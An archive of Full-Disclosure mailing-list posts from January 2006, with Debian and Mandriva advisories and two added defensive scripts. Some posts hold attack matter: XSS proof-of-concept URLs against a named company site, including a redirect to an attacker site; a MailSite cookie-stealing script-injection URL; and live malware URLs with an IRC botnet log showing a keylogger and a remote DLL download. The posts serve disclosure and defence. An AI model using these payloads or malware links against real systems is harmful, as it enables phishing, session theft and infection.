Re: [Full-disclosure] MBT Xss vulnerability
Hahaha ... native code doesn't seem to understand the meaning of XSS and why it can be of security concern. Here not only URL redirection is possible but also execution of malicious JavaScript is possible. Your lame reply makes me think that you are one of the following:

1. An employee of MBT criticising me in the interest of the company, 'or'
2. A poor spammer who doesn't know anything but tries to show off as if he is the MASTER.

If this is the case carry on with your spamming business and good luck for your future.

Regards;
Santosh J.

On 1/20/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
> Actually, what's lame is you bashing someone for telling others about a security vulnerability. Keep posting!
>
> -Adriel
>
> -----Original Message-----
> From: Native.Code [EMAIL PROTECTED]
> To: MuNNa [EMAIL PROTECTED]
> Cc: full-disclosure@lists.grok.org.uk
> Sent: Thu, 19 Jan 2006 21:52:54 +0800
> Subject: Re: [Full-disclosure] MBT Xss vulnerability
>
>> What a lame vulnerability it is. If your POC redirects to another site (which is not the MBT site), how will someone become a victim and believe that he/she is doing business with MBT?
>>
>> Your post is yet another proof that FD is more and more inhabited by script kiddies. Get a life!
>>
>> On 1/19/06, MuNNa [EMAIL PROTECTED] wrote:
>>> Hi List;
>>>
>>> Recently, I found an XSS vulnerability in the MBT web site. MBT offers services from Consulting to Managed Services. It is a Corporate Member of The International Systems Security Engineering Association (ISSEA) and a BS 7799 (Information Security Management Framework) certified organization.
>>>
>>> Vulnerability: MBT XSS (Cross Site Scripting) Attacks
>>> Criticality: Medium
>>>
>>> Description:
>>> MBT ( http://www.mahindrabt.com/website/index.htm ) is a leading India-based global IT solutions provider. As a proven leader in application outsourcing and offshoring of business critical applications, MBT enables its clients to protect their investment in legacy systems, enhance capital budgets, reduce operating expenses and build solutions for the multi-services future.
>>>
>>> However, it suffers from an XSS vulnerability on its own web page. Below is the proof-of-concept which explains this:
>>> http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss malcode here]
>>>
>>> Redirecting the site to any malicious or fake site to trap the victim:
>>> http://www.mahindrabt.com/jse/jsp/search.jsp?q=script document.location='http://www.[evil.site].com'/script
>>>
>>> Though it does not affect the server side a lot and may seem harmless, it can be used to target college students or job-seekers, as it is one of the most attractive employers. Targets can be lured to visit the malicious weblink under the pretext of some job positions being vacant.
>>>
>>> Vendor notification:
>>> Vendor has been notified twice, around 4 months ago, but still there is no response and I guess they are not going to respond either.
>>>
>>> Regards;
>>> Santosh J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 946-1] New sudo packages fix privilege escalation
--------------------------------------------------------------------------
Debian Security Advisory DSA 946-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
January 20th, 2006                      http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : sudo
Vulnerability  : missing input sanitising
Problem type   : local
Debian-specific: no
CVE IDs        : CVE-2005-4158 CVE-2006-0151
Debian Bug     : 342948

It has been discovered that sudo, a privileged program that provides limited super user privileges to specific users, passes several environment variables to the program that runs with elevated privileges. In the case of include paths (e.g. for Perl, Python, Ruby or other scripting languages) this can cause arbitrary code to be executed as the privileged user if the attacker points to a manipulated version of a system library.

This update alters the former behaviour of sudo and limits the number of supported environment variables to LC_*, LANG, LANGUAGE and TERM. Additional variables are only passed through when set as env_check in /etc/sudoers, which might be required for some scripts to continue to work.

For the old stable distribution (woody) this problem has been fixed in version 1.6.6-1.5.

For the stable distribution (sarge) this problem has been fixed in version 1.6.8p7-1.3.

For the unstable distribution (sid) this problem has been fixed in version 1.6.8p12-1.

We recommend that you upgrade your sudo package. For unstable, "Defaults = env_reset" needs to be added to /etc/sudoers manually.

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
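As an added example (not part of the Debian advisory or of sudo itself), the following POSIX sh script audits a sudoers file for the behaviour DSA 946-1 prescribes: env_reset present, and no interpreter include-path variables re-admitted through env_keep. The two sudoers fragments are constructed for the demonstration, and the list of variable names (PERL5LIB, PYTHONPATH, RUBYLIB and friends) is my own reading of the Perl, Python and Ruby include paths the advisory refers to.

```shell
#!/bin/sh
# Added example, not part of DSA 946-1: audit a sudoers file for the
# environment handling the advisory prescribes. The sample sudoers texts
# below are constructed for this demonstration, not real configurations.

# Interpreter search-path variables of the kind the advisory describes
# (Perl, Python, Ruby include paths). This list is the author's own
# assumption, not taken from the advisory.
RISKY_VARS='PERL5LIB PERLLIB PYTHONPATH PYTHONHOME RUBYLIB'

# audit_sudoers FILE
# Prints one line per check and returns 0 when FILE sets env_reset and
# keeps none of the risky variables; returns 1 when a finding is printed.
audit_sudoers() {
    file=$1
    rc=0

    # Strip comments, keep only Defaults lines (Defaults:user, Defaults@host,
    # Defaults>runas and Defaults!cmd all start the same way).
    defaults=$(sed 's/#.*//' "$file" | grep -E '^[[:space:]]*Defaults' || true)

    # Check 1: the fix itself. env_reset must be present and not negated;
    # "!env_reset" does not match because "!" is not in the leading class.
    if printf '%s\n' "$defaults" | grep -Eq '(^|[[:space:],])env_reset([[:space:],]|$)'; then
        echo "OK:      $file sets env_reset"
    else
        echo "FINDING: $file does not set env_reset; the caller's environment reaches the privileged program"
        rc=1
    fi

    # Check 2: a risky variable listed in env_keep is passed unchecked, which
    # reopens what the advisory fixed. A variable in env_check is passed only
    # when its value contains no '/' or '%', so that is reported as a note.
    for var in $RISKY_VARS; do
        pattern="[[:space:]\"=+,]$var([[:space:]\",]|\$)"
        if printf '%s\n' "$defaults" | grep -E 'env_keep' | grep -Eq "$pattern"; then
            echo "FINDING: $file keeps $var via env_keep"
            rc=1
        elif printf '%s\n' "$defaults" | grep -E 'env_check' | grep -Eq "$pattern"; then
            echo "NOTE:    $file passes $var via env_check (dropped when the value contains '/' or '%')"
        fi
    done
    return $rc
}

# Constructed sample 1: no env_reset, and interpreter paths re-admitted.
WEAK=$(mktemp)
cat >"$WEAK" <<'EOF'
# constructed sample, not a real /etc/sudoers
Defaults        env_keep += "PERL5LIB PYTHONPATH"
root    ALL=(ALL) ALL
EOF

# Constructed sample 2: what DSA 946-1 prescribes. Reset the environment and
# pass any extra variable only through env_check.
FIXED=$(mktemp)
cat >"$FIXED" <<'EOF'
# constructed sample, not a real /etc/sudoers
Defaults        env_reset
Defaults        env_check += "TZ"
root    ALL=(ALL) ALL
EOF
trap 'rm -f "$WEAK" "$FIXED"' EXIT

audit_sudoers "$WEAK"  || echo "=> sample 1 would fail review"
audit_sudoers "$FIXED" && echo "=> sample 2 passes"
```

Run it against a copy of your own sudoers (never edit the live file without visudo) to see which of the two shapes it matches.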
[Full-disclosure] [SECURITY] [DSA 947-1] New ClamAV packages fix heap overflow
--------------------------------------------------------------------------
Debian Security Advisory DSA 947-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                              Michael Stone
January 21st, 2006                      http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : clamav
Vulnerability  : heap overflow
Problem type   : remote
Debian-specific: no
CVE IDs        : CVE-2006-0162
Debian Bug     : 320014

A heap overflow has been discovered in ClamAV, a virus scanner, which could allow an attacker to execute arbitrary code by sending a carefully crafted UPX-encoded executable to a system running ClamAV. In addition, other potential overflows have been corrected.

The old stable distribution (woody) does not include ClamAV.

For the stable distribution (sarge) this problem has been fixed in version 0.84-2.sarge.7.

For the unstable distribution (sid) this problem has been fixed in version 0.86.2-1.

We recommend that you upgrade your clamav package immediately.

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
[Full-disclosure] [SECURITY] [DSA 948-1] New kdelibs packages fix buffer overflow
--------------------------------------------------------------------------
Debian Security Advisory DSA 948-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                         Moritz Muehlenhoff
January 20th, 2005                      http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : kdelibs
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-0019

Maksim Orlovich discovered that the kjs Javascript interpreter, used in the Konqueror web browser and in other parts of KDE, performs insufficient bounds checking when parsing UTF-8 encoded Uniform Resource Identifiers, which may lead to a heap based buffer overflow and the execution of arbitrary code.

The old stable distribution (woody) is not affected by this problem.

For the stable distribution (sarge) this problem has been fixed in version 3.3.2-6.4.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your kdelibs package.

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
[Full-disclosure] [SECURITY] [DSA 949-1] New crawl packages fix potential group games execution
--------------------------------------------------------------------------
Debian Security Advisory DSA 949-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
January 20th, 2006                      http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package        : crawl
Vulnerability  : insecure program execution
Problem type   : local
Debian-specific: no
CVE ID         : CVE-2006-0044

Steve Kemp from the Debian Security Audit project discovered a security related problem in crawl, another console based dungeon exploration game in the vein of nethack and rogue. The program executes commands insecurely when saving or loading games, which can allow local attackers to gain group games privileges.

For the old stable distribution (woody) this problem has been fixed in version 4.0.0beta23-2woody2.

For the stable distribution (sarge) this problem has been fixed in version 4.0.0beta26-4sarge0.

For the unstable distribution (sid) this problem has been fixed in version 4.0.0beta26-7.

We recommend that you upgrade your crawl package.

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
[Full-disclosure] new nokia bluetooth worms...
If anyone catches this please let me know and hook a brotha up with a copy.

http://isc.sans.org/diary.php?storyid=1056

As a side note, it's nice to know that the UK-style Bluetooth advertising HAS hit the US finally. Lots of vendors are still NOT signing their .SIS files!

-KF
[Full-disclosure] RockLiffe MailSite wconsole.dll Denial of Service/Script Injection Vulnerability
OS2A RockLiffe MailSite wconsole.dll Denial of Service/Script Injection Vulnerability

OS2A ID: OS2A_1004

Status:
01/06/2006  Issue Discovered
01/06/2006  Reported to the vendor
01/19/2006  Patch Released
01/20/2006  Advisory Released

Class: Denial of Service / Script Injection
Severity: CRITICAL

Overview:
Rockliffe's MailSite is a program for providing access to email accounts on Microsoft Windows operating systems. The MailSite HTTP Mail management agent could allow a remote attacker to cause a denial of service or execute arbitrary script code.

Description:
1. MailSite HTTP Mail management agent version 7.0.3.1 could allow a remote attacker to cause a denial of service. A bug in the input validation routine in httpma causes the svchost process to consume more CPU cycles, thus impacting the MailSite HTTP Management agent and ultimately crashing the service.
2. MailSite HTTP Mail management agent 6.x and 5.x could allow a remote attacker to inject arbitrary script code. This vulnerability is caused by a design error in wconsole.dll. This DLL file contains embedded HTML code which does not properly sanitize user input.

Impact:
1. Remote attackers can exploit this issue to trigger a denial of service condition.
2. An attacker may leverage this issue to have arbitrary script code executed in the browser in the context of the affected site.

Affected Software(s):
MailSite 7.0.3.1 and prior
MailSite 6.1.22 and prior
MailSite 5.x

Affected platform(s): Windows (Any)

Exploit/Proof of Concept:
For the 7.x series:
http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?Authenticate|cmd
Any special characters passed to the parameters of wconsole.dll trigger the denial of service.

For the 6.x and 5.x series:
http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?%3Cscript%3Ealert(document.cookie)%3C/script%3E

Solutions:
For the 7.x series apply the following patch:
ftp://ftp.rockliffe.com/MailSite/Latest/Hotfixes/

For the 6.x series apply the following patch:
ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/

Credits:
Rahul Mohandas of OS2A has been credited with the discovery of this vulnerability.
Re: [Full-disclosure] Possible large botnet
Is it just me who thinks linking to a log of thousands of e-mail addresses is in very poor taste on a mirrored list? If they weren't harvested before they will be now.

-sb

On 1/20/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
> I don't necessarily think whomever was infected was infected via viewing this site:
>
> http://php.tjit.or.kr/ppp/log/sent.txt
>
> lists a slew of email addresses which whomever could have sent bogus messages to, to possibly infect (l)users.
>
> On Fri, 20 Jan 2006 01:35:45 -0500 Pablo Esterban [EMAIL PROTECTED] wrote:
>> Seems to be a botnet forming with the help of exploiting the recent WMF flaw on the following site. AFAIK malware/adware is referencing this.
>>
>> D O  N O T  C L I C K
>> http://213.17.233.194/mediabar.wmf
>> http://213.17.233.194/stat_s3.php
>> http://213.17.233.194/stat.html
>> D O  N O T  C L I C K
>>
>> This injects a trojan connecting to 219.240.142.59 on port 44234.
>>
>> 44234/tcp open irc        Unreal ircd
>> 47292/tcp open irc        Unreal ircd
>> 47296/tcp open irc        Unreal ircd
>> 54729/tcp open irc-proxy  psyBNC 2.3.1
>>
>> Channel stats list around 500 bots and around 1200 connected (may or may not be accurate); however, if you poke around you will find http://219.240.142.59/usage/, containing some interesting links and info about when this most likely started.
>>
>> The TCP stream below demos the login and the calling of http://219.240.142.59/ppp/mediax.dll. Stats for January list close to 90k hits on this particular file(!).
>>
>> NICK *
>> USER plnaehe 0 0 :*
>> :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
>> :irc.foonet.com NOTICE AUTH :*** Found your hostname
>> :irc.foonet.com 001 * :Welcome to the ROXnet IRC Network *
>> :irc.foonet.com 002 * :Your host is irc.foonet.com, running version Unreal3.2.3
>> :irc.foonet.com 003 * :This server was created Thu Oct 13 2005 at 17:25:57 KST
>> :irc.foonet.com 005 * SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server
>> :irc.foonet.com 005 * SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT [EMAIL PROTECTED] EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
>> :irc.foonet.com 251 * :There are 1 users and 1194 invisible on 1 servers
>> :irc.foonet.com 252 * 1 :operator(s) online
>> :irc.foonet.com 253 * 201 :unknown connection(s)
>> :irc.foonet.com 254 * 10 :channels formed
>> :irc.foonet.com 255 * :I have 1195 clients and 0 servers
>> :irc.foonet.com 265 * :Current Local Users: 1195  Max: 5529
>> :irc.foonet.com 266 * :Current Global Users: 1195  Max: 1276
>> :irc.foonet.com 422 * :MOTD File is missing
>> * MODE * :+iwTxd
>> USERHOST *
>> :irc.foonet.com 302 * :*
>> MODE * -x+B
>> JOIN #mrbean5 rowan
>> PRIVMSG * :[KEYLOG]: Key logger active.
>> USERHOST *
>> MODE * -x+B
>> JOIN #mrbean5 rowan
>> USERHOST *
>> MODE * -x+B
>> JOIN #mrbean5 rowan
>> :irc.foonet.com NOTICE * :BOTMOTD File not found
>> * MODE * :-x+B
>> * JOIN :#mrbean5
>> :irc.foonet.com 332 * #mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3
>> :irc.foonet.com 333 * #mrbean5 DDDI 1137401387
>> :irc.foonet.com 353 * @ #mrbean5 *
>> :irc.foonet.com 366 * #mrbean5 :End of /NAMES list.
>> * PRIVMSG * :[KEYLOG]: Key logger active.
>> :irc.foonet.com 302 *
>> :irc.foonet.com 302 *
>> PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll.
>> :irc.foonet.com 404 * #mrbean5 :You need voice (+v) (#mrbean5)
>> PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec.
>> PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll.
>> :irc.foonet.com 404 * #mrbean5 :You need voice (+v) (#mrbean5)
>> :irc.foonet.com 404 * #mrbean5 :You need voice (+v) (#mrbean5)
Re: [Full-disclosure] MBT Xss vulnerability
Hey guy, do you know something about XSS?
1) Phishing?
2) Encoded URL, UTF8...?
3) Cookie stealing?
...

It'll not be difficult to reproduce a website and have a URL difficult to understand for a basic user... Sure, it's harder to spoof the URL in the browser...

// Native.Code wrote:
> What a lame vulnerability it is. If your POC redirects to another site (which is not the MBT site), how will someone become a victim and believe that he/she is doing business with MBT?
>
> Your post is yet another proof that FD is more and more inhabited by script kiddies. Get a life!

- About FD: Speech is silver, but silence is gold

/JA
/https://www.securinfos.info/
Re: [Full-disclosure] MBT Xss vulnerability
Well, I'm not going to talk about how XSS is useless, because we all know it can be quite a serious problem. I think, and I don't know the guy so I can't be sure, the original dissenter to this post was pointing out that: what would you phish from a site that doesn't have any forms anyway? What would stealing a session cookie get you if the only dynamic content is a search function? I'm not saying XSS isn't important, I'm just wondering why this case is?

-sb

On 1/20/06, Jerome Athias [EMAIL PROTECTED] wrote:
> Hey guy, do you know something about XSS?
> 1) Phishing?
> 2) Encoded URL, UTF8...?
> 3) Cookie stealing?
> ...
>
> It'll not be difficult to reproduce a website and have a URL difficult to understand for a basic user... Sure, it's harder to spoof the URL in the browser...
>
> // Native.Code wrote:
>> What a lame vulnerability it is. If your POC redirects to another site (which is not the MBT site), how will someone become a victim and believe that he/she is doing business with MBT?
>>
>> Your post is yet another proof that FD is more and more inhabited by script kiddies. Get a life!
>
> - About FD: Speech is silver, but silence is gold
>
> /JA
> /https://www.securinfos.info/
Re: [Full-disclosure] Re: Re: PC Firewall Choices
Nancy, I was not trying to make the point that ZA is some buggy unusable crap. Just that even properly configured we have encountered instances where it misbehaves, behaves inconsistently, and slows down web browsing with IE (not so much with Opera or Firefox apparently, as I tried that out last night under a few setups). That said, configuring it correctly is key to its operation; if you misclicked at some point and accidentally set a rule not to allow certain traffic or a certain application access to the network, then you may experience the problems you describe. Please make sure you review all the rules and specific application settings to make sure your problems aren't configuration-related.

-sb

On 1/20/06, Nancy Kramer [EMAIL PROTECTED] wrote:
> I have the paid ZA but I heard the free one was better. Have no idea about that but would never buy the paid version again. At least now I know what was happening. Will try to look for that feature and set it to the maximum minutes. I only have it on my laptop, which only goes on the internet sporadically but generally goes on the internet on public wireless networks, which I think may not be all that secure. Lots of times I am meeting with someone there and we talk and then look up something on the internet. I could see how time could pass quickly and I might not touch the computer for a while. Thanks for the explanation.
>
> Regards,
> Nancy Kramer
>
> At 10:10 PM 1/19/2006, Greg wrote:
>> -Original Message-
>> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer
>> Sent: Friday, 20 January 2006 2:30 PM
>> To: Stan Bubrouski; full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices
>>
>>> I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can.
>>
>> That'd be a well known and never fixed bug I reported to Zonelabs some years back now. It has a feature to automatically lock the internet connection after so many minutes of inactivity. The length of time can be changed by the user. What it REALLY did was cut off access to the internet and any LAN you were on, isolating you entirely, and never actually let go of it when the user was back at the keyboard. Exiting ZA let that go and internet and LAN were restored. You have the option to turn that feature OFF but even that didn't stop the whole thing happening. So, about the only thing you could do was to set the auto lock as high as it could go and turn the feature off. It would still go off after that many minutes had passed (which I believe is 999 in the PRO version and 99 in the free version) and lock you out again, but it was delayed by that much, at least.
>>
>> You CAN set certain programs to pass by its lock, however. So, if you have some computers almost always chattering away on a distributed project but otherwise not touched, you could allow those programs to pass on even though, should you attempt to get out with a simple web browser (where it wasn't allowed to pass the lock), you can't. Saves some stuffing about on such machines and let's face it - the more free some company execs see, the more likely they are to use it. Surprising how many Windows based companies use free ZA.

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
Reading over this again let me clarify why I'm curious about this:

1) Yes I'm aware someone could redirect someone to a form claiming to be by MBT to harvest information
2) I just don't see the relevance to this list (if we reported every XSS in every site, we could fill this list with 100s of messages per day)

Know what I mean?

-sb

On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
> Well I'm not going to talk about how XSS is useless because we all know it can be quite a serious problem. I think, and I don't know the guy so I can't be sure, the original dissenter to this post was pointing out that: What would you phish from a site that doesn't have any forms anyways? What would stealing a session cookie get you if the only dynamic content is a search function? I'm not saying XSS isn't important, I'm just wondering why this case is?
>
> -sb
>
> On 1/20/06, Jerome Athias [EMAIL PROTECTED] wrote:
>> Hey guy, do you know something about XSS?
>> 1) Phishing?
>> 2) encoded URL, UTF8...?
>> 3) cookie steal?
>> ... it'll not be difficult to reproduce a website and have a URL difficult to understand for a basic user... sure it's harder to spoof the URL in the browser...
>>
>> // Native.Code wrote:
>>> What a lame vulnerability it is. If your POC redirects to another site (which is not the MBT site), how will someone become a victim and believe that he/she is doing business with MBT? Your post is yet another proof that FD is more and more inhibited by script kiddies. Get a life!
>>
>> - About FD: Speech is silver, but silence is gold
>> /JA
>> /https://www.securinfos.info/
[Full-disclosure] MDKSA-2006:018 - Updated kernel packages fix several vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___
Mandriva Linux Security Advisory MDKSA-2006:018
http://www.mandriva.com/security/
___

Package : kernel
Date: January 20, 2006
Affected: 2006.0
___

Problem Description:

A number of vulnerabilities have been corrected in the Linux kernel:

A race condition in the 2.6 kernel could allow a local user to cause a DoS by triggering a core dump in one thread while another thread has a pending SIGSTOP (CVE-2005-3527).

The ptrace functionality in 2.6 kernels prior to 2.6.14.2, using CLONE_THREAD, does not use the thread group ID to check whether it is attaching to itself, which could allow local users to cause a DoS (CVE-2005-3783).

The auto-reap child process in 2.6 kernels prior to 2.6.15 includes processes with ptrace attached, which leads to a dangling ptrace reference and allows local users to cause a crash (CVE-2005-3784).

A locking problem in the POSIX timer cleanup handling on exit on kernels 2.6.10 to 2.6.14, when running on SMP systems, allows a local user to cause a deadlock involving process CPU timers (CVE-2005-3805).

The IPv6 flowlabel handling code in 2.4 and 2.6 kernels prior to 2.4.32 and 2.6.14 modifies the wrong variable in certain circumstances, which allows local users to corrupt kernel memory or cause a crash by triggering a free of non-allocated memory (CVE-2005-3806).

An integer overflow in 2.6.14 and earlier could allow a local user to cause a hang via 64-bit mmap calls that are not properly handled on a 32-bit system (CVE-2005-3808).

As well, other bugfixes are included in this update: fixes to swsup and HDA sound fixes (DMA buffer fixes, fixes for the AD1986a codec, added support for Nvidia chipsets, and new model information for the Gigabyte K8N51). MCP51 forcedeth support has been added.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3527
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3784
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3805
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3806
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3808
___

Updated Packages:

Mandriva Linux 2006.0:
c71acedddee438c177e44c59ace9231c 2006.0/RPMS/kernel-2.6.12.15mdk-1-1mdk.i586.rpm
be94c46555066619429aba3c11e88c49 2006.0/RPMS/kernel-i586-up-1GB-2.6.12.15mdk-1-1mdk.i586.rpm
0506cd9f49c7fa8998ea9611c22fa33b 2006.0/RPMS/kernel-i686-up-4GB-2.6.12.15mdk-1-1mdk.i586.rpm
bdc7d06043c6a98a1a9d1baee3bc47dd 2006.0/RPMS/kernel-smp-2.6.12.15mdk-1-1mdk.i586.rpm
e4283335d3c3f2ff679dbaf672e2a288 2006.0/RPMS/kernel-source-2.6-2.6.12-15mdk.i586.rpm
4114739c58dd249e23afbde019ecf5e7 2006.0/RPMS/kernel-source-stripped-2.6-2.6.12-15mdk.i586.rpm
f9f5deb668cfdaf90f66a50de54e8e54 2006.0/RPMS/kernel-xbox-2.6.12.15mdk-1-1mdk.i586.rpm
bc0bade8d53184908296fac79fc07724 2006.0/RPMS/kernel-xen0-2.6.12.15mdk-1-1mdk.i586.rpm
8e4f4040d6b08d25cf323a451301cfe6 2006.0/RPMS/kernel-xenU-2.6.12.15mdk-1-1mdk.i586.rpm
786b6c30ae9c052de3a856d8933fe2fd 2006.0/SRPMS/kernel-2.6.12.15mdk-1-1mdk.src.rpm

Mandriva Linux 2006.0/X86_64:
cf1e06a1f851f40a4298b9d7f8135da5 x86_64/2006.0/RPMS/kernel-2.6.12.15mdk-1-1mdk.x86_64.rpm
00a15f173dc072f60c810b8d513987c9 x86_64/2006.0/RPMS/kernel-smp-2.6.12.15mdk-1-1mdk.x86_64.rpm
b82e5e65bb03c557a3d1f6f3145a58cd x86_64/2006.0/RPMS/kernel-source-2.6-2.6.12-15mdk.x86_64.rpm
6ed321add133142fb3f597e004c9747f x86_64/2006.0/RPMS/kernel-source-stripped-2.6-2.6.12-15mdk.x86_64.rpm
786b6c30ae9c052de3a856d8933fe2fd x86_64/2006.0/SRPMS/kernel-2.6.12.15mdk-1-1mdk.src.rpm
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com
___

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFD0Q4XmqjQ0CJFipgRAr2hAJ91vhSFOR0gbGWyhJ1HEiMdKMaJqgCeLoyJ
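The advisory says urpmi and MandrivaUpdate verify the md5 checksums for you; the following is an added example, not Mandriva's tooling, of doing the same check by hand against the "Updated Packages" list format. The manifest, file names and digests below are constructed for the example (the digests belong to the constructed file contents, not to any real package).

```python
"""Check downloaded packages against the md5 list in an advisory's
"Updated Packages" section.

Added example, not Mandriva's tooling. SAMPLE_MANIFEST is constructed:
placeholder file names, digests of the constructed contents written by demo().
"""
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple

HEX = set("0123456789abcdef")

# Constructed manifest in the advisory's "<md5> <relative path>" layout.
SAMPLE_MANIFEST = """\
Updated Packages:

Example Distro 1.0:
b1946ac92492d2347c6235b4d2611184 1.0/RPMS/example-good-1.0.i586.rpm
00000000000000000000000000000000 1.0/RPMS/example-tampered-1.0.i586.rpm
d41d8cd98f00b204e9800998ecf8427e 1.0/RPMS/example-missing-1.0.i586.rpm
"""


def parse_manifest(text: str) -> Dict[str, str]:
    """Map relative path -> expected md5 for every '<32 hex> <path>' line.

    Section headers such as 'Example Distro 1.0:' and blank lines are skipped.
    """
    expected: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2 and len(parts[0]) == 32 and set(parts[0]) <= HEX:
            expected[parts[1]] = parts[0].lower()
    return expected


def md5_of_file(path: str) -> str:
    """Stream the file so large kernel packages are not read into memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_downloads(manifest: Dict[str, str], root: str) -> Tuple[List[str], List[str], List[str]]:
    """Return (ok, mismatched, missing) relative paths found under root."""
    ok: List[str] = []
    mismatched: List[str] = []
    missing: List[str] = []
    for rel, digest in sorted(manifest.items()):
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            missing.append(rel)
        elif md5_of_file(path) == digest:
            ok.append(rel)
        else:
            mismatched.append(rel)
    return ok, mismatched, missing


def demo() -> Tuple[List[str], List[str], List[str]]:
    """Build a throwaway download directory that exercises all three outcomes."""
    manifest = parse_manifest(SAMPLE_MANIFEST)
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "1.0", "RPMS"))
        with open(os.path.join(root, "1.0/RPMS/example-good-1.0.i586.rpm"), "wb") as fh:
            fh.write(b"hello\n")      # md5 b1946ac9...: matches the manifest
        with open(os.path.join(root, "1.0/RPMS/example-tampered-1.0.i586.rpm"), "wb") as fh:
            fh.write(b"hello!\n")     # content differs: digest will not match
        # example-missing is deliberately never written
        return verify_downloads(manifest, root)


if __name__ == "__main__":
    ok, bad, gone = demo()
    print("ok:", ok)
    print("mismatched:", bad)
    print("missing:", gone)
```

A matching md5 only tells you the file is the one the advisory lists; what ties that list to Mandriva is the PGP signature on the advisory itself, which is what `gpg --verify` checks after the `gpg --recv-keys` step above has imported the 0x22458A98 key.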
Re: [Full-disclosure] MBT Xss vulnerability
Hii

